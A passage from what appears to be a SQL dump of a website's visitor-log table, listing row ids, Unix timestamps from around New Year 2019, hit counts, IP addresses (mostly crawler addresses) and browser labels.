67.109','other'),(362866,1546296842,3,3,0,0,'216.244.66.241','other'),(362867,1546296881,1,1,0,0,'54.36.148.93','other'),(362868,1546296925,1,1,0,0,'95.163.255.174','other'),(362869,1546296928,1,1,0,0,'95.163.255.183','other'),(362870,1546296945,2,2,0,0,'95.163.255.105','other'),(362872,1546297045,1,1,0,0,'54.36.148.53','other'),(362873,1546297151,176,176,0,0,'69.30.226.234','other'),(362874,1546297167,1,1,0,0,'54.36.149.14','other'),(362875,1546297253,1,1,0,0,'95.163.255.112','other'),(362876,1546297430,8,8,0,0,'69.30.210.242','other'),(362877,1546297747,1,1,0,0,'37.73.221.28','chrome'),(362878,1546297787,1,1,0,0,'66.249.66.156','chrome'),(362879,1546297959,3,3,0,0,'5.45.207.19','other'),(362880,1546297981,3,3,0,0,'141.8.142.103','other'),(362881,1546298137,1,1,0,0,'178.154.244.11','other'),(362882,1546298154,1,1,0,0,'157.55.39.115','other'),(362883,1546298165,1,1,0,0,'5.45.207.79','other'),(362884,1546298311,1,1,0,0,'54.36.148.120','other'),(362885,1546298386,2,2,0,0,'92.112.249.221','chrome'),(362886,1546298462,1,1,0,0,'66.102.9.40','chrome'),(362887,1546298654,1,1,0,0,'54.36.148.142','other'),(362888,1546298812,2,2,0,0,'46.219.216.125','chrome'),(362889,1546298948,1,1,0,0,'66.249.66.157','chrome'),(362890,1546298949,1,1,0,0,'66.249.66.154','chrome'),(362891,1546298951,2,2,0,0,'54.36.148.153','other'),(362892,1546299228,1,1,0,0,'54.36.148.190','other'),(362893,1546299677,7,7,0,0,'216.244.66.241','other'),(362894,1546299689,1,1,0,0,'46.229.168.152','other'),(362895,1546299726,1,1,0,0,'5.45.207.19','other'),(362896,1546299887,3,3,0,0,'157.55.39.115','other'),(362897,1546300273,1,1,0,0,'95.133.238.127','other'),(362898,1546300914,1,1,0,0,'54.36.149.107','other'),(362899,1546301228,1,1,0,0,'46.229.168.151','other'),(362900,1546301303,1,1,0,0,'95.133.238.127','chrome'),(362901,1546301329,1,1,0,0,'8.29.198.27','other'),(362902,1546301553,1,1,0,0,'54.36.148.137','other'),(362903,1546301605,1,1,0,0,'54.36.148.248','other'),(362904,1546301653,1,1,0,0,'91.196.178.13','chrome'),(362905,1546301705,1,1,0,0,'95.163.255.92','other'),(362906,1546301709,1,1,0,0,'95.163.255.98','other'),(362907,1546301795,1,1,0,0,'54.36.149.47','other'),(362908,1546301822,2,2,0,0,'37.73.221.59','chrome'),(362909,1546301910,1,1,0,0,'46.229.168.130','other'),(362910,1546301937,1,1,0,0,'54.36.149.54','other'),(362911,1546302114,1,1,0,0,'54.36.149.4','other'),(362912,1546302217,1,1,0,0,'54.36.149.10','other'),(362913,1546302224,1,1,0,0,'8.29.198.26','other'),(362914,1546302378,1,1,0,0,'54.36.149.99','other'),(362915,1546302466,2,2,0,0,'95.163.255.177','other'),(362916,1546302473,8,8,0,0,'216.244.66.241','other'),(362917,1546302477,1,1,0,0,'54.36.148.164','other'),(362918,1546302574,1,1,0,0,'66.249.66.156','chrome'),(362919,1546302575,1,1,0,0,'66.249.66.152','chrome'),(362920,1546302657,1,1,0,0,'180.76.15.21','other'),(362921,1546302658,1,1,0,0,'180.76.15.160','other'),(362922,1546302961,1,1,0,0,'54.36.148.197','other'),(362923,1546303311,1,1,0,0,'54.36.148.87','other'),(362924,1546303498,1,1,0,0,'54.36.148.55','other'),(362925,1546303520,1,1,0,0,'54.36.148.245','other'),(362926,1546304053,1,1,0,0,'54.36.148.98','other'),(362927,1546304085,1,1,0,0,'46.229.168.135','other'),(362928,1546304125,1,1,0,0,'54.36.148.61','other'),(362929,1546304129,1,1,0,0,'89.31.57.5','other'),(362930,1546304160,1,1,0,0,'66.249.66.154','chrome'),(362931,1546304369,1,1,0,0,'95.163.255.65','other'),(362932,1546304372,1,1,0,0,'95.163.255.67','other'),(362933,1546304447,1,1,0,0,'54.36.148.170','other'),(362934,1546304459,1,1,0,0,'216.244.66.241','other'),(362935,1546304970,1,1,0,0,'66.249.66.157','chrome'),(362937,1546305275,1,1,0,0,'91.196.178.84','chrome'),(362938,1546305341,1,1,0,0,'54.36.148.152','other'),(362939,1546305462,2,2,0,0,'216.244.66.241','other'),(362940,1546305527,1,1,0,0,'37.9.113.148','other'),(362941,1546305678,1,1,0,0,'46.229.168.133','other'),(362942,1546305749,1,1,0,0,'54.36.148.211','other'),(362943,1546305954,1,1,0,0,'178.154.244.11','other'),(362944,1546305980,1,1,0,0,'54.36.148.115','other'),(362945,1546306029,1,1,0,0,'54.36.149.24','other'),(362946,1546306109,1,1,0,0,'54.36.148.183','other'),(362947,1546306252,1,1,0,0,'66.249.66.154','chrome'),(362948,1546306301,1,1,0,0,'54.36.148.188','other'),(362949,1546306311,1,1,0,0,'54.36.149.48','other'),(362950,1546306425,1,1,0,0,'54.36.148.132','other'),(362951,1546306445,1,1,0,0,'46.229.168.129','other'),(362952,1546306541,1,1,0,0,'216.244.66.241','other'),(362953,1546306573,1,1,0,0,'13.57.233.99','chrome'),(362954,1546307015,1,1,0,0,'5.45.207.79','other'),(362955,1546307952,1,1,0,0,'5.45.207.79','other'),(362956,1546308199,11,11,0,0,'216.244.66.241','other'),(362957,1546308374,2,2,0,0,'141.8.142.103','other'),(362958,1546308556,4,4,0,0,'5.45.207.19','other'),(362959,1546308606,3,3,0,0,'95.108.213.4','other'),(362960,1546308845,1,1,0,0,'54.36.149.37','other'),(362961,1546308849,12,12,0,0,'178.154.244.11','other'),(362962,1546308857,1,1,0,0,'46.229.168.133','other'),(362963,1546308880,8,8,0,0,'5.45.207.79','other'),(362964,1546309262,1,1,0,0,'46.229.168.151','other'),(362965,1546309352,3,3,0,0,'141.8.142.103','other'),(362966,1546309456,1,1,0,0,'54.36.148.146','other'),(362967,1546309498,1,1,0,0,'46.229.168.135','other'),(362968,1546309500,1,1,0,0,'46.229.168.144','other'),(362969,1546309532,1,1,0,0,'87.250.224.47','other'),(362970,1546309574,3,3,0,0,'95.108.213.4','other'),(362971,1546309739,1,1,0,0,'216.244.66.241','other'),(362972,1546309799,1,1,0,0,'5.45.207.79','other'),(362973,1546309838,1,1,0,0,'46.229.168.136','other'),(362974,1546309849,3,3,0,0,'178.154.244.11','other'),(362975,1546309851,2,2,0,0,'5.45.207.19','other'),(362976,1546309957,1,1,0,0,'54.36.148.240','other'),(362977,1546309984,1,1,0,0,'157.55.39.176','other'),(362978,1546310348,1,1,0,0,'54.36.148.79','other'),(362979,1546310402,1,1,0,0,'54.36.148.224','other'),(362980,1546310798,1,1,0,0,'46.229.168.135','other'),(362981,1546310820,1,1,0,0,'95.163.255.92','other'),(362982,1546310823,1,1,0,0,'95.163.255.94','other'),(362983,1546310958,1,1,0,0,'54.36.149.97','other'),(362984,1546310971,1,1,0,0,'54.36.148.16','other'),(362985,1546310974,1,1,0,0,'66.249.66.155','chrome'),(362986,1546310976,1,1,0,0,'66.249.66.152','chrome'),(362987,1546311083,1,1,0,0,'54.36.148.99','other'),(362988,1546311105,3,3,0,0,'216.244.66.241','other'),(362989,1546311757,1,1,0,0,'54.36.148.26','other'),(362990,1546311783,1,1,0,0,'207.46.13.43','other'),(362991,1546311821,1,1,0,0,'54.36.149.85','other'),(362992,1546312016,1,1,0,0,'54.36.148.208','other'),(362993,1546312052,1,1,0,0,'54.36.148.122','other'),(362994,1546312086,1,1,0,0,'54.36.148.240','other'),(362995,1546312118,1,1,0,0,'141.8.142.103','other'),(362996,1546312125,1,1,0,0,'54.36.149.92','other'),(362997,1546312175,1,1,0,0,'54.36.149.4','other'),(362998,1546312180,2,2,0,0,'8.29.198.26','other'),(362999,1546312238,1,1,0,0,'54.36.148.138','other'),(363000,1546312380,1,1,0,0,'54.36.149.79','other'),(363001,1546312476,1,1,0,0,'54.36.148.30','other'),(363002,1546312512,1,1,0,0,'54.36.148.89','other'),(363003,1546312677,1,1,0,0,'54.36.148.242','other'),(363004,1546313019,1,1,0,0,'40.77.167.12','other'),(363005,1546313158,1,1,0,0,'207.46.13.5','other'),(363006,1546313183,1,1,0,0,'54.36.148.191','other'),(363007,1546313257,1,1,0,0,'95.163.255.195','other'),(363008,1546313260,1,1,0,0,'95.163.255.182','other'),(363009,1546313507,1,1,0,0,'54.36.148.144','other'),(363010,1546313529,1,1,0,0,'184.94.240.92','firefox'),(363011,1546313600,1,1,0,0,'95.163.255.193','other'),(363012,1546313602,1,1,0,0,'95.163.255.167','other'),(363013,1546313817,8,8,0,0,'216.244.66.241','other'),(363014,1546313930,1,1,0,0,'46.229.168.133','other'),(363015,1546313961,1,1,0,0,'54.36.149.51','other'),(363016,1546314223,1,1,0,0,'46.229.168.152','other'),(363017,1546314403,1,1,0,0,'54.36.149.2','other'),(363018,1546314601,1,1,0,0,'54.36.149.5','other'),(363019,1546314617,1,1,0,0,'54.36.148.66','other'),(363020,1546314619,1,1,0,0,'66.249.66.156','chrome'),(363021,1546314620,1,1,0,0,'66.249.66.152','chrome'),(363022,1546314669,1,1,0,0,'54.36.148.146','other'),(363023,1546315052,2,2,0,0,'37.73.203.0','chrome'),(363024,1546315064,1,1,0,0,'207.46.13.5','other'),(363025,1546315290,1,1,0,0,'5.45.207.79','other'),(363026,1546315300,1,1,0,0,'54.36.149.93','other'),(363027,1546315350,1,1,0,0,'207.46.13.43','other'),(363028,1546315437,1,1,0,0,'54.36.149.83','other'),(363029,1546315475,1,1,0,0,'46.229.168.146','other'),(363030,1546315752,2,2,0,0,'216.244.66.241','other'),(363031,1546315760,1,1,0,0,'54.36.148.111','other'),(363032,1546315947,1,1,0,0,'54.36.148.51','other'),(363033,1546315975,1,1,0,0,'54.36.148.170','other'),(363034,1546316015,1,1,0,0,'54.36.148.17','other'),(363035,1546316035,1,1,0,0,'54.36.148.200','other'),(363036,1546316067,1,1,0,0,'54.36.148.221','other'),(363037,1546316316,1,1,0,0,'54.36.148.73','other'),(363038,1546316344,1,1,0,0,'54.36.149.29','other'),(363039,1546316461,1,1,0,0,'46.229.168.146','other'),(363040,1546316531,1,1,0,0,'66.249.66.156','chrome'),(363041,1546316532,1,1,0,0,'66.249.66.152','chrome'),(363042,1546316566,1,1,0,0,'54.36.148.153','other'),(363043,1546316697,6,6,0,0,'216.244.66.241','other'),(363044,1546316829,1,1,0,0,'178.154.244.11','other'),(363045,1546317079,1,1,0,0,'46.229.168.135','other'),(363046,1546317160,1,1,0,0,'66.249.66.42','chrome'),(363047,1546317814,1,1,0,0,'54.36.148.32','other'),(363048,1546317910,2,2,0,0,'207.46.13.10','other'),(363049,1546317920,1,1,0,0,'54.36.148.153','other'),(363050,1546318236,1,1,0,0,'54.36.148.169','other'),(363051,1546318399,1,1,0,0,'95.163.255.175','other'),(363052,1546318402,1,1,0,0,'95.163.255.160','other'),(363053,1546318436,1,1,0,0,'54.36.149.50','other'),(363054,1546318487,1,1,0,0,'54.36.148.111','other'),(363055,1546318530,1,1,0,0,'46.229.168.134','other'),(363056,1546318553,2,2,0,0,'95.163.255.163','other'),(363057,1546318558,1,1,0,0,'95.163.255.195','other'),(363058,1546318577,1,1,0,0,'54.36.148.246','other'),(363059,1546318673,1,1,0,0,'95.163.255.180','other'),(363060,1546318729,1,1,0,0,'54.36.148.238','other'),(363061,1546318787,1,1,0,0,'54.36.148.189','other'),(363062,1546318818,1,1,0,0,'54.36.148.25','other'),(363063,1546318907,1,1,0,0,'66.249.66.155','chrome'),(363064,1546318908,1,1,0,0,'66.249.66.154','chrome'),(363065,1546319081,1,1,0,0,'54.36.148.241','other'),(363066,1546319236,1,1,0,0,'46.229.168.142','other'),(363067,1546319269,1,1,0,0,'157.55.39.176','other'),(363068,1546319409,1,1,0,0,'54.36.148.198','other'),(363069,1546319432,3,3,0,0,'216.244.66.241','other'),(363070,1546319437,6,6,0,0,'178.154.244.11','other'),(363071,1546319477,4,4,0,0,'141.8.142.103','other'),(363072,1546319512,1,1,0,0,'54.36.148.178','other'),(363073,1546319578,4,4,0,0,'5.45.207.19','other'),(363074,1546319674,5,5,0,0,'5.45.207.79','other'),(363075,1546320066,1,1,0,0,'40.77.167.12','other'),(363076,1546320441,3,3,0,0,'95.108.213.4','other'),(363077,1546320463,1,1,0,0,'54.36.148.109','other'),(363078,1546320477,1,1,0,0,'46.229.168.144','other'),(363079,1546320479,1,1,0,0,'46.229.168.154','other'),(363080,1546320540,1,1,0,0,'46.229.168.139','other'),(363081,1546320549,1,1,0,0,'37.9.113.20','other'),(363082,1546320558,5,5,0,0,'178.154.244.11','other'),(363083,1546320566,4,4,0,0,'5.45.207.19','other'),(363084,1546320688,4,4,0,0,'141.8.142.103','other'),(363085,1546320747,7,7,0,0,'5.45.207.79','other'),(363086,1546320838,1,1,0,0,'54.36.148.177','other'),(363087,1546321238,1,1,0,0,'87.250.224.47','other'),(363088,1546321703,1,1,0,0,'54.36.149.2','other'),(363089,1546322043,1,1,0,0,'213.180.203.23','other'),(363090,1546322057,1,1,0,0,'5.45.207.79','other'),(363091,1546322226,7,7,0,0,'216.244.66.241','other'),(363092,1546322478,1,1,0,0,'207.46.13.51','other'),(363093,1546322570,1,1,0,0,'54.36.148.120','other'),(363094,1546322572,1,1,0,0,'54.36.149.53','other'),(363095,1546322628,1,1,0,0,'54.36.148.142','other'),(363096,1546322739,2,2,0,0,'185.112.82.95','other'),(363097,1546323013,2,2,0,0,'8.29.198.25','other'),(363098,1546323129,2,2,0,0,'66.249.66.156','chrome'),(363099,1546323203,1,1,0,0,'54.36.149.38','other'),(363100,1546323242,1,1,0,0,'54.36.149.35','other'),(363101,1546323251,1,1,0,0,'54.36.148.197','other'),(363102,1546323459,1,1,0,0,'54.36.148.36','other'),(363103,1546323468,1,1,0,0,'40.77.167.109','other'),(363104,1546323598,2,2,0,0,'34.220.109.204','chrome'),(363105,1546323758,1,1,0,0,'54.36.148.97','other'),(363106,1546323802,1,1,0,0,'54.36.148.161','other'),(363107,1546323845,1,1,0,0,'54.36.148.108','other'),(363108,1546323886,1,1,0,0,'207.46.13.43','other'),(363109,1546324049,1,1,0,0,'54.36.149.54','other'),(363110,1546324125,1,1,0,0,'66.249.66.40','chrome'),(363111,1546324161,1,1,0,0,'207.46.13.193','other'),(363112,1546324162,1,1,0,0,'54.36.148.148','other'),(363113,1546324330,1,1,0,0,'54.36.148.217','other'),(363114,1546324412,1,0,1,0,'66.249.66.156',''),(363115,1546324413,1,0,1,0,'66.249.66.154',''),(363116,1546325023,1,1,0,0,'54.36.149.9','other'),(363117,1546325031,5,5,0,0,'216.244.66.241','other'),(363118,1546325153,1,1,0,0,'54.36.148.190','other'),(363119,1546325213,1,1,0,0,'54.36.148.26','other'),(363120,1546325580,1,1,0,0,'207.46.13.51','other'),(363121,1546325879,1,1,0,0,'66.249.66.59','chrome'),(363123,1546325920,1,1,0,0,'46.229.168.142','other'),(363124,1546325948,1,1,0,0,'207.46.13.5','other'),(363125,1546326276,1,1,0,0,'54.36.149.93','other'),(363126,1546326442,1,1,0,0,'54.36.148.14','other'),(363127,1546326540,1,1,0,0,'54.36.149.79','other'),(363128,1546326629,1,1,0,0,'54.36.148.221','other'),(363129,1546326927,1,1,0,0,'54.36.148.252','other'),(363130,1546326977,1,1,0,0,'54.36.148.52','other'),(363131,1546326979,1,1,0,0,'46.229.168.139','other'),(363132,1546327356,1,1,0,0,'54.36.148.103','other'),(363133,1546327838,5,5,0,0,'216.244.66.241','other'),(363134,1546327884,1,1,0,0,'54.36.149.86','other'),(363135,1546328439,1,1,0,0,'66.249.66.44','chrome'),(363136,1546328458,1,1,0,0,'54.36.149.103','other'),(363137,1546328515,1,1,0,0,'192.162.243.201','chrome'),(363138,1546328536,1,1,0,0,'178.154.244.11','other'),(363139,1546328601,1,1,0,0,'87.250.224.47','other'),(363140,1546328667,1,1,0,0,'95.108.213.4','other'),(363141,1546328678,1,1,0,0,'207.46.13.10','other'),(363142,1546328707,1,1,0,0,'54.36.148.19','other'),(363143,1546328718,1,1,0,0,'5.45.207.79','other'),(363144,1546328756,1,1,0,0,'46.229.168.147','other'),(363145,1546328829,1,1,0,0,'54.36.148.46','other'),(363146,1546328837,1,1,0,0,'54.36.149.12','other'),(363147,1546328886,1,1,0,0,'54.36.149.76','other'),(363148,1546329016,1,1,0,0,'54.36.148.105','other'),(363149,1546329134,1,1,0,0,'54.36.148.115','other'),(363150,1546329486,1,1,0,0,'54.36.148.171','other'),(363151,1546329601,1,1,0,0,'95.163.255.94','other'),(363152,1546329602,1,1,0,0,'54.36.149.87','other'),(363153,1546329604,1,1,0,0,'95.163.255.98','other'),(363154,1546329687,1,1,0,0,'95.163.255.102','other'),(363155,1546329692,1,1,0,0,'95.163.255.112','other'),(363156,1546329763,1,1,0,0,'54.36.148.90','other'),(363157,1546329765,2,2,0,0,'216.244.66.241','other'),(363158,1546330063,2,2,0,0,'178.154.244.11','other'),(363159,1546330110,1,1,0,0,'5.45.207.8','other'),(363160,1546330133,3,3,0,0,'46.211.133.121','chrome'),(363161,1546330172,2,2,0,0,'5.45.207.19','other'),(363162,1546330247,1,1,0,0,'207.46.13.10','other'),(363163,1546330251,1,1,0,0,'37.9.113.103','other'),(363164,1546330287,1,1,0,0,'5.45.207.79','other'),(363165,1546330408,1,1,0,0,'54.36.149.31','other'),(363166,1546330410,1,1,0,0,'87.250.224.47','other'),(363167,1546330411,1,1,0,0,'141.8.142.103','other'),(363168,1546330672,1,1,0,0,'54.36.148.218','other'),(363169,1546330697,7,7,0,0,'216.244.66.241','other'),(363170,1546330928,1,1,0,0,'40.77.167.109','other'),(363171,1546331036,1,1,0,0,'95.163.255.115','other'),(363172,1546331227,1,1,0,0,'207.46.13.51','other'),(363173,1546331275,1,1,0,0,'40.77.167.10','other'),(363174,1546331286,1,1,0,0,'54.36.148.207','other'),(363175,1546331316,1,1,0,0,'5.45.207.19','other'),(363176,1546331421,2,2,0,0,'207.46.13.43','other'),(363177,1546331490,2,2,0,0,'46.211.36.69','chrome'),(363178,1546331562,1,1,0,0,'95.163.255.106','other'),(363179,1546331584,1,1,0,0,'54.36.148.27','other'),(363180,1546331636,1,1,0,0,'66.249.66.156','chrome'),(363181,1546331637,1,1,0,0,'66.249.66.154','chrome'),(363182,1546331816,1,1,0,0,'216.244.66.241','other'),(363183,1546331917,1,1,0,0,'54.36.149.50','other'),(363184,1546331921,1,1,0,0,'46.229.168.139','other'),(363185,1546331923,1,1,0,0,'46.229.168.153','other'),(363186,1546332144,1,1,0,0,'54.36.149.28','other'),(363187,1546332709,1,1,0,0,'46.229.168.132','other'),(363188,1546332763,2,2,0,0,'66.249.66.156','chrome'),(363189,1546332792,1,1,0,0,'178.154.244.11','other'),(363190,1546332821,1,1,0,0,'66.249.66.154','chrome'),(363191,1546332932,1,1,0,0,'54.36.148.225','other'),(363192,1546333081,1,1,0,0,'54.36.148.253','other'),(363193,1546333206,3,3,0,0,'95.133.151.59','chrome'),(363194,1546333424,6,6,0,0,'216.244.66.241','other'),(363195,1546333466,1,1,0,0,'54.36.148.187','other'),(363196,1546333683,1,1,0,0,'46.229.168.143','other'),(363197,1546333852,1,1,0,0,'8.29.198.27','other'),(363198,1546333891,1,1,0,0,'54.36.148.234','other'),(363199,1546334032,1,1,0,0,'54.36.148.221','other'),(363200,1546334043,1,1,0,0,'207.46.13.10','other'),(363201,1546334353,1,1,0,0,'66.249.66.44','chrome'),(363202,1546334565,2,2,0,0,'40.77.167.10','other'),(363203,1546334691,1,1,0,0,'54.36.149.105','other'),(363204,1546334730,1,1,0,0,'8.29.198.26','other'),(363205,1546334821,1,1,0,0,'216.244.66.241','other'),(363206,1546335048,1,1,0,0,'46.229.168.148','other'),(363207,1546335049,1,1,0,0,'54.36.149.30','other'),(363208,1546335050,1,1,0,0,'46.229.168.135','other'),(363209,1546335124,1,1,0,0,'95.163.255.94','other'),(363210,1546335128,1,1,0,0,'95.163.255.98','other'),(363211,1546335167,1,1,0,0,'95.163.255.114','other'),(363212,1546335169,1,1,0,0,'95.163.255.103','other'),(363213,1546335173,1,1,0,0,'95.163.255.113','other'),(363214,1546335238,1,1,0,0,'66.249.66.152','chrome'),(363215,1546335315,1,1,0,0,'54.36.149.57','other'),(363216,1546335353,1,1,0,0,'66.249.66.154','chrome'),(363217,1546335390,1,1,0,0,'66.249.66.155','chrome'),(363218,1546335391,1,1,0,0,'66.249.66.156','chrome'),(363219,1546335431,1,1,0,0,'54.36.148.35','other'),(363220,1546335517,1,1,0,0,'54.36.149.5','other'),(363221,1546335605,1,1,0,0,'95.163.255.115','other'),(363222,1546335607,1,1,0,0,'95.163.255.168','other'),(363223,1546335609,1,1,0,0,'95.163.255.180','other'),(363224,1546335623,1,1,0,0,'54.36.148.36','other'),(363225,1546335652,1,1,0,0,'46.229.168.147','other'),(363226,1546335761,1,1,0,0,'54.36.148.151','other'),(363227,1546335839,1,1,0,0,'54.36.148.230','other'),(363228,1546335932,1,1,0,0,'54.36.148.65','other'),(363229,1546336157,1,1,0,0,'66.249.66.152','chrome'),(363230,1546336228,7,7,0,0,'216.244.66.241','other'),(363231,1546336387,1,1,0,0,'54.36.149.39','other'),(363232,1546336515,2,2,0,0,'40.77.167.109','other'),(363233,1546336544,3,3,0,0,'66.249.66.156','chrome'),(363235,1546336611,1,1,0,0,'54.36.148.122','other'),(363236,1546336654,2,2,0,0,'95.133.151.59','chrome'),(363237,1546336716,1,1,0,0,'95.163.255.181','other'),(363238,1546336724,1,1,0,0,'95.163.255.157','other'),(363239,1546336919,1,1,0,0,'54.36.148.171','other'),(363240,1546336994,1,1,0,0,'207.46.13.10','other'),(363241,1546337146,1,1,0,0,'46.229.168.132','other'),(363242,1546337147,1,1,0,0,'46.229.168.142','other'),(363243,1546337160,1,1,0,0,'54.36.148.40','other'),(363244,1546337191,1,1,0,0,'216.244.66.241','other'),(363245,1546337296,1,1,0,0,'54.36.148.100','other'),(363246,1546337398,1,1,0,0,'54.36.149.49','other'),(363247,1546337978,1,1,0,0,'54.36.148.127','other'),(363248,1546338014,3,3,0,0,'91.196.178.59','chrome'),(363249,1546338147,1,1,0,0,'54.36.149.104','other'),(363250,1546338252,1,1,0,0,'91.196.178.186','other'),(363251,1546338535,1,1,0,0,'95.108.213.4','other'),(363252,1546338584,6,6,0,0,'5.45.207.79','other'),(363253,1546338659,5,5,0,0,'178.154.244.11','other'),(363254,1546338662,6,6,0,0,'5.45.207.19','other'),(363255,1546338832,1,1,0,0,'54.36.149.9','other'),(363256,1546338844,1,1,0,0,'54.36.149.72','other'),(363257,1546338866,1,1,0,0,'54.36.148.172','other'),(363258,1546339027,4,4,0,0,'216.244.66.241','other'),(363259,1546339282,1,1,0,0,'54.36.148.219','other'),(363260,1546339285,1,1,0,0,'141.8.142.103','other'),(363261,1546339417,1,1,0,0,'207.46.13.10','other'),(363262,1546339569,2,2,0,0,'178.154.244.11','other'),(363263,1546339798,2,2,0,0,'66.249.66.42','chrome'),(363264,1546339881,1,1,0,0,'54.36.148.128','other'),(363265,1546339911,1,1,0,0,'54.36.149.24','other'),(363266,1546339966,2,2,0,0,'35.210.84.51','chrome'),(363267,1546339968,1,1,0,0,'37.73.238.108','chrome'),(363268,1546340064,1,1,0,0,'216.244.66.241','other'),(363269,1546340214,1,1,0,0,'54.36.148.73','other'),(363270,1546340266,1,1,0,0,'54.36.149.76','other'),(363271,1546340267,2,2,0,0,'66.249.66.40','chrome'),(363272,1546340294,1,1,0,0,'54.36.149.49','other'),(363273,1546340376,2,2,0,0,'5.45.207.79','other'),(363274,1546340383,1,1,0,0,'54.36.148.61','other'),(363275,1546340578,2,2,0,0,'66.249.66.156','chrome'),(363276,1546340929,1,1,0,0,'54.36.148.90','other'),(363277,1546341019,1,1,0,0,'54.36.148.46','other'),(363278,1546341118,6,6,0,0,'207.46.13.10','other'),(363279,1546341128,8,8,0,0,'207.46.13.51','other'),(363280,1546341135,10,10,0,0,'157.55.39.241','other'),(363281,1546341155,5,5,0,0,'40.77.167.109','other'),(363282,1546341656,1,1,0,0,'54.36.148.187','other'),(363283,1546341884,1,1,0,0,'54.36.148.15','other'),(363284,1546341929,5,5,0,0,'216.244.66.241','other'),(363285,1546342187,1,1,0,0,'157.55.39.241','other'),(363286,1546342478,3,3,0,0,'207.46.13.51','other'),(363287,1546342780,1,1,0,0,'66.249.66.42','chrome'),(363288,1546343004,1,1,0,0,'54.36.148.88','other'),(363289,1546343103,1,1,0,0,'54.36.149.35','other'),(363290,1546343759,1,1,0,0,'54.36.149.57','other'),(363291,1546343770,1,1,0,0,'54.36.149.60','other'),(363292,1546343808,1,1,0,0,'46.229.168.136','other'),(363293,1546344203,1,1,0,0,'54.36.148.101','other'),(363294,1546344213,1,1,0,0,'66.249.66.157','chrome'),(363295,1546344214,1,1,0,0,'66.249.66.154','chrome'),(363296,1546344227,1,1,0,0,'54.36.148.174','other'),(363297,1546344299,1,1,0,0,'54.36.148.63','other'),(363298,1546344381,1,1,0,0,'51.255.65.46','other'),(363299,1546344647,1,1,0,0,'157.55.39.241','other'),(363300,1546344658,8,8,0,0,'216.244.66.241','other'),(363301,1546344686,2,2,0,0,'8.29.198.26','other'),(363302,1546344768,1,1,0,0,'54.36.149.107','other'),(363303,1546345398,1,1,0,0,'54.36.148.243','other'),(363304,1546345568,1,1,0,0,'54.36.148.234','other'),(363305,1546345705,2,2,0,0,'216.244.66.241','other'),(363306,1546345745,1,1,0,0,'54.36.149.18','other'),(363307,1546345763,1,1,0,0,'5.196.87.71','other'),(363308,1546346195,1,1,0,0,'5.45.207.19','other'),(363309,1546346212,1,1,0,0,'95.163.255.162','other'),(363310,1546346480,2,2,0,0,'46.211.27.144','chrome'),(363311,1546346520,2,2,0,0,'46.101.39.13','chrome'),(363312,1546346569,1,1,0,0,'46.229.168.151','other'),(363313,1546346638,1,1,0,0,'40.77.167.109','other'),(363314,1546346786,2,2,0,0,'157.55.39.241','other'),(363315,1546346952,1,1,0,0,'66.249.66.59','chrome'),(363316,1546346953,1,1,0,0,'66.249.66.44','chrome'),(363317,1546346992,1,1,0,0,'54.36.148.247','other'),(363318,1546347056,1,1,0,0,'185.57.228.248','firefox'),(363319,1546347083,1,1,0,0,'54.36.149.36','other'),(363320,1546347461,2,2,0,0,'216.244.66.241','other'),(363321,1546347507,1,1,0,0,'54.36.148.237','other'),(363322,1546347518,2,2,0,0,'95.108.213.4','other'),(363323,1546347575,1,1,0,0,'54.36.148.211','other'),(363324,1546347581,1,1,0,0,'37.9.113.148','other'),(363325,1546347650,5,5,0,0,'178.154.244.11','other'),(363326,1546347772,4,4,0,0,'5.45.207.79','other'),(363327,1546347817,4,4,0,0,'5.45.207.19','other'),(363328,1546347993,1,1,0,0,'54.36.148.234','other'),(363329,1546348005,1,1,0,0,'66.249.66.157','chrome'),(363330,1546348006,1,1,0,0,'66.249.66.156','chrome'),(363331,1546348013,1,1,0,0,'87.250.224.65','other'),(363332,1546348345,1,1,0,0,'54.36.149.67','other'),(363333,1546348410,1,1,0,0,'66.249.66.155','chrome'),(363335,1546348615,1,1,0,0,'216.244.66.241','other'),(363336,1546348617,1,1,0,0,'141.8.142.103','other'),(363337,1546348635,1,1,0,0,'54.36.149.81','other'),(363338,1546348637,1,1,0,0,'46.229.168.149','other'),(363339,1546348703,1,1,0,0,'178.154.244.11','other'),(363340,1546348913,1,1,0,0,'54.36.148.35','other'),(363341,1546349049,1,1,0,0,'5.45.207.79','other'),(363342,1546349059,1,1,0,0,'180.76.15.23','other'),(363343,1546349613,1,1,0,0,'54.36.149.25','other'),(363344,1546349891,1,1,0,0,'54.36.149.100','other'),(363345,1546349920,1,1,0,0,'66.249.66.44','chrome'),(363346,1546349937,1,1,0,0,'54.36.148.159','other'),(363347,1546349941,1,1,0,0,'54.36.148.189','other'),(363348,1546350056,1,1,0,0,'54.36.148.206','other'),(363349,1546350073,1,1,0,0,'46.229.168.153','other'),(363350,1546350163,1,1,0,0,'54.36.148.142','other'),(363351,1546350188,1,1,0,0,'40.77.167.109','other'),(363352,1546350199,1,1,0,0,'54.36.149.11','other'),(363353,1546350298,1,1,0,0,'46.229.168.133','other'),(363354,1546350300,1,1,0,0,'46.229.168.144','other'),(363355,1546350329,7,7,0,0,'216.244.66.241','other'),(363356,1546350565,1,1,0,0,'54.36.148.78','other'),(363357,1546350763,1,1,0,0,'54.36.149.46','other'),(363358,1546351174,1,1,0,0,'54.36.148.134','other'),(363359,1546351448,1,1,0,0,'54.36.148.103','other'),(363360,1546351575,1,1,0,0,'54.36.148.252','other'),(363361,1546352056,1,1,0,0,'66.249.66.156','chrome'),(363363,1546352132,1,1,0,0,'54.36.148.141','other'),(363364,1546352202,1,1,0,0,'216.244.66.241','other'),(363365,1546352268,1,1,0,0,'46.229.168.140','other'),(363366,1546352486,1,1,0,0,'54.36.148.235','other'),(363367,1546353044,1,1,0,0,'54.36.148.84','other'),(363368,1546353154,1,1,0,0,'46.229.168.145','other'),(363369,1546353229,8,8,0,0,'216.244.66.241','other'),(363370,1546353236,1,1,0,0,'54.36.149.90','other'),(363371,1546353409,1,1,0,0,'54.36.148.76','other'),(363372,1546353435,1,1,0,0,'54.36.148.141','other'),(363373,1546353461,1,1,0,0,'54.36.148.205','other'),(363374,1546353732,1,1,0,0,'54.36.149.83','other'),(363375,1546353749,1,1,0,0,'54.36.148.117','other'),(363376,1546354136,1,1,0,0,'54.36.149.55','other'),(363377,1546354639,1,1,0,0,'31.184.238.101','chrome'),(363378,1546354664,1,1,0,0,'54.36.148.26','other'),(363379,1546354684,1,1,0,0,'54.36.148.86','other'),(363380,1546354746,1,1,0,0,'54.36.148.204','other'),(363381,1546354851,1,1,0,0,'54.36.148.98','other'),(363382,1546354999,1,1,0,0,'54.36.149.11','other'),(363383,1546355153,1,1,0,0,'54.36.149.6','other'),(363384,1546355513,